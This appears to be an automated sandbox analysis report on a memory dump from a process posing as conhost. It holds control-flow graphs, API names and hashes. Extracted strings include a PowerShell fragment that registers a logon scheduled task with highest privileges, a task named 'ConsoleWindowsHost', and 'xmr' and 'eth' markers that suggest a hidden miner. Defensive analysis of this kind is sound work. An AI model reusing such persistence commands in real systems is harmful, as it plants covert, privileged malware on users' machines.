                                    control_flow_graph 544 7ff6d68ac2e0-7ff6d68ac30b 545 7ff6d68ac311-7ff6d68ac32b strncmp 544->545 546 7ff6d68ac708-7ff6d68ac712 544->546 548 7ff6d68ac331-7ff6d68ac366 545->548 549 7ff6d68ac686-7ff6d68ac68f 545->549 546->545 547 7ff6d68ac718 546->547 547->548 551 7ff6d68ac42b-7ff6d68ac495 strlen 548->551 549->548 550 7ff6d68ac695-7ff6d68ac6a3 549->550 550->548 552 7ff6d68ac6a9-7ff6d68ac6af 550->552 553 7ff6d68ac71d 551->553 554 7ff6d68ac49b-7ff6d68ac4e5 call 7ff6d68ae3d0 * 2 551->554 556 7ff6d68ac6b1-7ff6d68ac6b3 552->556 557 7ff6d68ac6b9-7ff6d68ac6c0 552->557 555 7ff6d68ac71f-7ff6d68ac732 553->555 563 7ff6d68ac370-7ff6d68ac373 554->563 564 7ff6d68ac4eb-7ff6d68ac4ee 554->564 556->548 556->557 557->548 559 7ff6d68ac6c6-7ff6d68ac6d3 557->559 559->548 565 7ff6d68ac640-7ff6d68ac650 call 7ff6d68a4e50 563->565 566 7ff6d68ac379-7ff6d68ac385 563->566 567 7ff6d68ac4f4-7ff6d68ac500 564->567 568 7ff6d68ac417-7ff6d68ac41b 564->568 579 7ff6d68ac658-7ff6d68ac66a 565->579 572 7ff6d68ac391-7ff6d68ac3a0 strlen 566->572 573 7ff6d68ac387-7ff6d68ac38b 566->573 567->568 574 7ff6d68ac506-7ff6d68ac518 567->574 569 7ff6d68ac421-7ff6d68ac428 568->569 570 7ff6d68ac733 568->570 569->551 577 7ff6d68ac735-7ff6d68ac738 570->577 580 7ff6d68ac3a6-7ff6d68ac3bf 572->580 581 7ff6d68ac6fc-7ff6d68ac700 572->581 573->572 573->579 575 7ff6d68ac51e-7ff6d68ac520 574->575 576 7ff6d68ac6ec-7ff6d68ac6f4 call 7ff6d68a7190 574->576 575->576 582 7ff6d68ac526-7ff6d68ac541 call 7ff6d68a7c00 575->582 576->581 577->555 584 7ff6d68ac6d8-7ff6d68ac6e7 call 7ff6d68a7190 579->584 585 7ff6d68ac66c-7ff6d68ac66e 579->585 580->581 586 7ff6d68ac3c5-7ff6d68ac3e1 580->586 581->546 598 7ff6d68ac547-7ff6d68ac549 582->598 599 7ff6d68ac40a-7ff6d68ac40d 582->599 588 7ff6d68ac3e5-7ff6d68ac406 call 7ff6d68a4140 strlen 584->588 585->584 587 7ff6d68ac670-7ff6d68ac681 call 7ff6d68a7c00 585->587 586->588 587->588 588->599 598->599 601 7ff6d68ac54f 598->601 599->568 600 7ff6d68ac40f-7ff6d68ac411 599->600 600->568 602 7ff6d68ac73a-7ff6d68ac7d0 call 7ff6d68a44c0 600->602 603 7ff6d68ac550-7ff6d68ac568 601->603 614 7ff6d68ac7d2 602->614 615 7ff6d68ac7dc-7ff6d68ac883 call 7ff6d68ae3d0 * 2 call 7ff6d68aaf20 602->615 604 7ff6d68ac56e-7ff6d68ac571 603->604 605 7ff6d68ac894-7ff6d68ac89b 603->605 604->605 609 7ff6d68ac577-7ff6d68ac579 604->609 607 7ff6d68ac8a1-7ff6d68ac8a4 605->607 608 7ff6d68ac57f-7ff6d68ac587 605->608 607->608 611 7ff6d68ac8aa-7ff6d68ac8b0 607->611 613 7ff6d68ac599-7ff6d68ac5b1 608->613 609->608 612 7ff6d68ac888-7ff6d68ac88f 609->612 616 7ff6d68ac5c0-7ff6d68ac5c2 611->616 612->599 617 7ff6d68ac590-7ff6d68ac595 613->617 618 7ff6d68ac5b3-7ff6d68ac5b5 613->618 614->615 615->577 622 7ff6d68ac5c4-7ff6d68ac5ce 616->622 623 7ff6d68ac5fd-7ff6d68ac628 call 7ff6d68a4240 call 7ff6d68a4140 616->623 617->613 618->617 620 7ff6d68ac5b7 618->620 620->616 622->623 624 7ff6d68ac5d0-7ff6d68ac5e2 622->624 623->599 636 7ff6d68ac62e-7ff6d68ac631 623->636 624->616 628 7ff6d68ac5e4 624->628 631 7ff6d68ac5e8-7ff6d68ac5f7 628->631 631->631 634 7ff6d68ac5f9-7ff6d68ac5fb 631->634 634->622 634->623 636->603
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: strlenstrncmp
                                    • String ID: Z$Z$_$_$_$_GLOBAL_
                                    • API String ID: 1310274236-662103887
                                    • Opcode ID: 849a9cd468cdb9fcfdd473f9fae928589d1e1c559bbc51fb35f18c5fb1cc65d6
                                    • Instruction ID: dde75d1bc99ad3f740b84200ed4718d64c22dcc60458bd0db199997c8f61c8d1
                                    • Opcode Fuzzy Hash: 849a9cd468cdb9fcfdd473f9fae928589d1e1c559bbc51fb35f18c5fb1cc65d6
                                    • Instruction Fuzzy Hash: A8E1DF72E08A8289E7208F3598047FD3BE1BB05758F444136DE9C9B7C9DF3E96629760

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 638 7ff6d68adb76-7ff6d68adb9b 639 7ff6d68adcf0-7ff6d68adcf4 638->639 640 7ff6d68adba1-7ff6d68adba6 638->640 639->640 641 7ff6d68adcfa 639->641 642 7ff6d68adc03-7ff6d68adc08 640->642 643 7ff6d68adba8-7ff6d68adbad 640->643 644 7ff6d68adc50 641->644 645 7ff6d68adc0e 642->645 646 7ff6d68adcc5-7ff6d68adcd5 call 7ff6d68b6698 642->646 647 7ff6d68adbaf-7ff6d68adbb4 643->647 648 7ff6d68adc22-7ff6d68adc32 signal 643->648 655 7ff6d68adc55-7ff6d68adc5a 644->655 649 7ff6d68adc60-7ff6d68adc65 645->649 650 7ff6d68adc10-7ff6d68adc15 645->650 652 7ff6d68adcd7-7ff6d68adcda 646->652 669 7ff6d68add10-7ff6d68add24 signal 646->669 647->644 654 7ff6d68adbba 647->654 651 7ff6d68adc38-7ff6d68adc4c signal call 7ff6d68ad530 648->651 648->652 649->644 656 7ff6d68adc67-7ff6d68adc6c 649->656 650->644 657 7ff6d68adc17-7ff6d68adc1c 650->657 651->644 662 7ff6d68adcae-7ff6d68adcb8 652->662 663 7ff6d68adcdc-7ff6d68adce8 652->663 660 7ff6d68adca0-7ff6d68adca5 654->660 661 7ff6d68adbc0-7ff6d68adbc5 654->661 656->662 664 7ff6d68adc6e-7ff6d68adc7e signal 656->664 657->648 657->662 660->664 665 7ff6d68adca7-7ff6d68adcac 660->665 661->644 670 7ff6d68adbcb-7ff6d68adbd0 661->670 666 7ff6d68add00-7ff6d68add07 662->666 667 7ff6d68adcba-7ff6d68adcc1 662->667 663->655 673 7ff6d68adc84-7ff6d68adc87 664->673 674 7ff6d68add29-7ff6d68add3b signal 664->674 665->644 665->662 667->646 669->655 670->662 671 7ff6d68adbd6-7ff6d68adbe6 signal 670->671 675 7ff6d68add40-7ff6d68add52 signal 671->675 676 7ff6d68adbec-7ff6d68adbef 671->676 673->662 677 7ff6d68adc89-7ff6d68adc95 673->677 674->655 675->655 676->662 678 7ff6d68adbf5-7ff6d68adc01 676->678 677->655 678->655
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: signal
                                    • String ID: CCG
                                    • API String ID: 1946981877-1584390748
                                    • Opcode ID: f13047bc6d7352e1b8f11d5569b7695ae3152826a56b4fe30e1e83cf894c4ffc
                                    • Instruction ID: 0a8c17e28a0c51abd376c45de9e8a8f69c11f04cfc0b1e21ab0f628368f7c0a5
                                    • Opcode Fuzzy Hash: f13047bc6d7352e1b8f11d5569b7695ae3152826a56b4fe30e1e83cf894c4ffc
                                    • Instruction Fuzzy Hash: 05415220E5910346FBB811784450B7C11819F89324F699A37DE2EC63E2CD9FB8E99232
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: QueryVirtual
                                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                    • API String ID: 1804819252-1534286854
                                    • Opcode ID: 2c8d26977fc1ad65bf0bf3642cde603497243a1fb6ae674b2dccd6f23035e26d
                                    • Instruction ID: e64741617183801c6e498ce473debac361941044b876cd997d7cc658b6c18442
                                    • Opcode Fuzzy Hash: 2c8d26977fc1ad65bf0bf3642cde603497243a1fb6ae674b2dccd6f23035e26d
                                    • Instruction Fuzzy Hash: 9A61AF72E0964286EB108B55E844ABD77A0BB44B94F444236DF4EC77D1EF3EE465C720
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: fwprintf
                                    • String ID: %*.*S$%-*.*S$%.*S
                                    • API String ID: 968622242-2115465065
                                    • Opcode ID: e57924a271c519801a0f4579f9996a26a43e0f5ae51609d4395fbbbde7a7301b
                                    • Instruction ID: 4542e75d494ee6c568e67f10cef14b223f3635fdb61114c2e386d2c9788a3a12
                                    • Opcode Fuzzy Hash: e57924a271c519801a0f4579f9996a26a43e0f5ae51609d4395fbbbde7a7301b
                                    • Instruction Fuzzy Hash: 2741D573F1864285F7508E1DD4006BD62A1EB81BD5F188132DE8DCF6C9EE7EE4618B24
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %*.*s$%-*.*s$%.*s$%S <#lygkxs#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest
                                    • API String ID: 0-3985640014
                                    • Opcode ID: fddb9881937fad370ef5ca7410a34657c715f0875b45d61f60811ff44c5a2ddb
                                    • Instruction ID: b4123420c128646c6d49cc8e52bd9fa8f06ce178f1d948aa038b0ff8c61febbb
                                    • Opcode Fuzzy Hash: fddb9881937fad370ef5ca7410a34657c715f0875b45d61f60811ff44c5a2ddb
                                    • Instruction Fuzzy Hash: 4541B272E1828689F7609F2DD40067D7791EB40B95F98C136CE8DCE2C5EE6EB4648B30
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: memsetwcscatwcscpywcslen
                                    • String ID: \??\$eth
                                    • API String ID: 468205783-1480138707
                                    • Opcode ID: 1da8d7b30039a55c4e68dab3c3bf1b289be8d257a338f345f98b01255c23732d
                                    • Instruction ID: 3427be1d77b43ca518c4a399b9a5dde6b7e13062804e04db75dba85fc93e672c
                                    • Opcode Fuzzy Hash: 1da8d7b30039a55c4e68dab3c3bf1b289be8d257a338f345f98b01255c23732d
                                    • Instruction Fuzzy Hash: 0A31D321D28F4185FB11DB25E8017BD3360AF95784F004236D98DA77A1EF7EA0A6C364
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: wcscpywcslen
                                    • String ID: %S /run /tn "ConsoleWindowsHost"$\BaseNamedObjects\wqhuxjyrrhclgfix$xmr
                                    • API String ID: 225642448-800340309
                                    • Opcode ID: fcc0f16526fe57e0dd1e74996c1c46f2981fffd0c113baea7988c354ddfd6ccd
                                    • Instruction ID: c6689083302679e1474032ee99c2764852247107c7407f73f5690de7a4c1223f
                                    • Opcode Fuzzy Hash: fcc0f16526fe57e0dd1e74996c1c46f2981fffd0c113baea7988c354ddfd6ccd
                                    • Instruction Fuzzy Hash: 09310722E0964145EB30DF21A410BBEA690FB453A4F884637EE5D827D5EF7ED0A5C310
                                    APIs
                                    • VirtualProtect.KERNEL32(00007FF6D68C48B8,00007FF6D68C48B0,00007FF6D68C3D80,00007FFE2167ADA0,?,?,?,00000001,00007FF6D68A124C), ref: 00007FF6D68AD96D
                                      • Part of subcall function 00007FF6D68AD5B0: VirtualQuery.KERNEL32 ref: 00007FF6D68AD65B
                                    Strings
                                    • Unknown pseudo relocation protocol version %d., xrefs: 00007FF6D68ADB12
                                    • Unknown pseudo relocation bit size %d., xrefs: 00007FF6D68ADAEA
                                    • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF6D68ADB03
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: Virtual$ProtectQuery
                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                    • API String ID: 1027372294-1286557213
                                    • Opcode ID: 40bb6ec0e2fcfa0ac91cdaec07ff087abe4a194881d57c3908ad612544070288
                                    • Instruction ID: 99e7259b23747c8d4170b7dd399ad9ad95d37fd9b1e2d5c152ed40b47f198f55
                                    • Opcode Fuzzy Hash: 40bb6ec0e2fcfa0ac91cdaec07ff087abe4a194881d57c3908ad612544070288
                                    • Instruction Fuzzy Hash: 3D91E122F0864286FB208B25D500A7D67A1BF45794F588637CE1DD77C5EE3EE86AC720
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: freememcpystrlen
                                    • String ID:
                                    • API String ID: 2208669145-0
                                    • Opcode ID: 7411ab55849008a007dc6c83d4a2f9a73750c58f95e0d40c170e633452adc814
                                    • Instruction ID: d3ccb952a42540329ae60cfb375fb912d3c8e8223643e24c4d55b614b19ad546
                                    • Opcode Fuzzy Hash: 7411ab55849008a007dc6c83d4a2f9a73750c58f95e0d40c170e633452adc814
                                    • Instruction Fuzzy Hash: 7A310822E5D64241FB625E116A00BBDD2506F85BE0F184233EE5EC7BC4EF3EE595C220
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: Byte$CharLeadMultiWide
                                    • String ID:
                                    • API String ID: 2561704868-0
                                    • Opcode ID: fa114358f9d1c0645f095336089c12bb421f7b72dfbfd9187bbe8f1e91e12f03
                                    • Instruction ID: 182b23c6a20053b025f76c49a86596733a48cdc79a54a916b2204f03b204ae73
                                    • Opcode Fuzzy Hash: fa114358f9d1c0645f095336089c12bb421f7b72dfbfd9187bbe8f1e91e12f03
                                    • Instruction Fuzzy Hash: F231A572E4C28186E7604B29B8003AD7690BB98794F588136EADAC77D5CF7ED4E5CB10
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: wcslen
                                    • String ID: 0$@
                                    • API String ID: 4088430540-1545510068
                                    • Opcode ID: 6230bfe80de74524b571c293202e0682f4be3a49600a361216c278bb6c94a631
                                    • Instruction ID: 76a6dd24205f32d63f461ad0d45f67e66b32303b9eeb18125718d4cb604fde8d
                                    • Opcode Fuzzy Hash: 6230bfe80de74524b571c293202e0682f4be3a49600a361216c278bb6c94a631
                                    • Instruction Fuzzy Hash: 82213B32A1878086E7208B69F44579BB6A4FBC4394F604136FB8C87B99EF7DD059CB00
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: strlen
                                    • String ID: this${parm#$}
                                    • API String ID: 39653677-3278767634
                                    • Opcode ID: 4734cdfd62d6da564a1163cc26d8b44e41c56201c187ae32c523d42fb6adb101
                                    • Instruction ID: fb69dd73e130bdaf11e52469f9115b88aac24f41f82b04700a3a333e6f215f97
                                    • Opcode Fuzzy Hash: 4734cdfd62d6da564a1163cc26d8b44e41c56201c187ae32c523d42fb6adb101
                                    • Instruction Fuzzy Hash: 94217172E4C68281E7668F24E4007FD2691EB15B94F488133CE4A4AB89DF7EA4A59371
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: wcslen
                                    • String ID: 0$@
                                    • API String ID: 4088430540-1545510068
                                    • Opcode ID: c9b29f393ee61479386b84e06c7cd6f99f0b3a77d0f6a3c0fd8583e25555c003
                                    • Instruction ID: d993b72623f4a4adb90e357f7ae8e451014fcade521c9f68a2a3bd02755f95a1
                                    • Opcode Fuzzy Hash: c9b29f393ee61479386b84e06c7cd6f99f0b3a77d0f6a3c0fd8583e25555c003
                                    • Instruction Fuzzy Hash: 7C11BF22A1878182E7209BA5F48539EB760EFC4354F500136FB8DC7B99EF7DC4968B00
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-3474627141
                                    • Opcode ID: 1906c433a280d27318f41f189cba7d22c715d171994103e01e012b4c977d2e1c
                                    • Instruction ID: 55d71f541750989cca67670640c7891cda7818192aa7538fb23f030a5940f0be
                                    • Opcode Fuzzy Hash: 1906c433a280d27318f41f189cba7d22c715d171994103e01e012b4c977d2e1c
                                    • Instruction Fuzzy Hash: E601A522D08F84C5E6128F1CD8011EEB374FF59799F145322EB8D66260DF2AD557C700
                                    APIs
                                    Strings
                                    Memory Dump Source
